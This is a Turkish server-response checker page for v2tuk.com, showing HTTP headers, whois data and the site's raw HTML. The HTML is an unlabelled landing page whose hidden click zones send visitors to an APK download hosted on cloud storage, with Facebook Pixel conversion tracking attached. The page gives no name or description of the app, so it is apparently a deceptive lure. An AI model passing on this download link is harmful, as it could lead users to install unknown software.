Sunucu yanıtını kontrol edin

Sunucu yanıtı
NS kayıtları
Whois alanı
Yanıt başlıkları
İstek başlıkları
Ham HTML kodu
301 Moved Permanently - v2tuk.com
HTTP Status: 301
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Server: nginx
Date: Fri, 30 May 2025 09:35:03 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://v2tuk.com/
Strict-Transport-Security: max-age=31536000
server: nginx
date: Fri, 30 May 2025 09:35:04 GMT
content-type: text/html
content-length: 4684
last-modified: Tue, 24 Dec 2024 01:44:42 GMT
vary: Accept-Encoding
etag: "676a120a-124c"
strict-transport-security: max-age=31536000
accept-ranges: bytes

HTTP Kodu 301 Kalıcı Olarak Taşındı

301 http kodu, istenen kaynağın kalıcı olarak yeni bir URL'ye taşındığı anlamına gelir. Gelecekteki tüm istekler yeni adresi kullanmalıdır.

Kod 301 ne zaman kullanılır?

  • Bir web sitesi alan adını değiştirirken
  • URL yapılarını değiştirirken
  • SEO için yönlendirmeleri ayarlarken

Kod 301 kullanıcı için ne anlama geliyor?

Tarayıcı kullanıcıyı otomatik olarak yeni adrese yönlendirecek ve arama motorları dizinlerini güncelleyecektir.

GET / HTTP/1.1
Host: v2tuk.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes">
  <meta name="renderer" content="webkit|ie-comp|ie-stand">
  <meta http-equiv="MSThemeCompatible" content="no">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>v2tuk.com</title>
  <meta name="Keywords" content="">
  <meta name="Description" content="">
  <link rel="stylesheet" href="https://publicwebthird.oss-ap-southeast-1.aliyuncs.com/js/style.css">
  <link rel="stylesheet" href="https://publicwebthird.oss-ap-southeast-1.aliyuncs.com/js/swiper.min.css">

<script>
  var web_name = "v2tuk.com";
  var down_url = "https://thainfosnd.oss-ap-southeast-7.aliyuncs.com/999/vne-21507/apk/com.sjhdgp.qieydhz.apk";//下载地址
</script>
<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1453141855525736');
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=1453141855525736&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->




</head>

<body>
  <div class="container">
    <div id="all_down_load" class="module">
      <img src="https://publicwebthird.oss-ap-southeast-1.aliyuncs.com/yue2_7/15.jpg" >

            <!-- button1 -->
            <div id="down_load1" class="down_load" style="top: 37.5%;width: 60%;left: 20%;height: 9%;">
            </div>



            <!-- button2 -->
            <div id="down_load2" class="down_load" style="bottom: 9%;width: 60%;left: 20%;height: 0%;">
            </div>

    </div>

  </div>


<script type="text/javascript" src="https://publicwebthird.oss-ap-southeast-1.aliyuncs.com/js/swiper.min.js"></script>
<script type="text/javascript" src="https://publicwebthird.oss-ap-southeast-1.aliyuncs.com/js/jquery-1.7.2.min.js"></script>
<script type="text/javascript">

    var swiper = new Swiper('.swiper-container', {
      pagination: '.swiper-pagination',
      prevButton: '.swiper-button-prev',
      nextButton: '.swiper-button-next',
      paginationClickable: true,
      autoplay: 2000,
      loop: true,
      autoplayDisableOnInteraction: false,
    });

    var swiper1 = new Swiper('#swiper-container1', {
        paginationClickable: true,
        spaceBetween: 30,
        centeredSlides: true,
        autoplay: 3000,
        autoplayDisableOnInteraction: false,
        loop: true
    });
  //判断是否是 Ios 设备
    function checkIsAppleDevice() {
        var u = navigator.userAgent, app = navigator.appVersion;
        var ios = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
        var iPad = u.indexOf('iPad') > -1;
        var iPhone = u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1;
        if (ios || iPad || iPhone) {
            return true;
        } else {
            return false;
        }
    }
    //判断是否是 Android 设备
    function checkandroid(){
      var u = navigator.userAgent;
      var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1; //android终端
      return isAndroid;
    }


    //视频循环播放
    if($('#myVedio').length){
      var myVideo = document.getElementById("myVedio"); //通过js获取到vedio标签实例
      myVideo.addEventListener("ended", function() {//为vedio添加ended监听,当视频播放完毕后执行对应函数
        myVideo.play();
      });
    }


    var down_class_arr = document.getElementsByClassName('down_load');
    for (var i = 0; i < down_class_arr.length; i++) {
      down_class_arr[i].addEventListener('click', function() {
        var bag_name = web_name;
        var is_download = localStorage.getItem('is_download'+bag_name);
        if(is_download != 1){
          localStorage.setItem('is_download'+bag_name,'1');
          fbq('track', 'AddToWishlist');
        }
        if(typeof gtag_report_conversion === "function"){
          console.log("gtag_report_conversion");
          return gtag_report_conversion(down_url);
        }
        window.location.href = down_url;
      }, false);
    }



</script>


</body></html>
                               

Alan adının whois bilgisi

Domain Name: V2TUK.COM
Registry Domain ID: 2808015533_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2024-08-24T11:20:59Z
Creation Date: 2023-08-23T09:26:58Z
Registry Expiry Date: 2025-08-23T09:26:58Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS75.DOMAINCONTROL.COM
Name Server: NS76.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-05-30T09:34:46Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
TERMS OF USE: You are not authorized to access or query our Whois
by the following terms of use: You agree that you may use this Data only
to: (1) allow, enable, or otherwise support the transmission of mass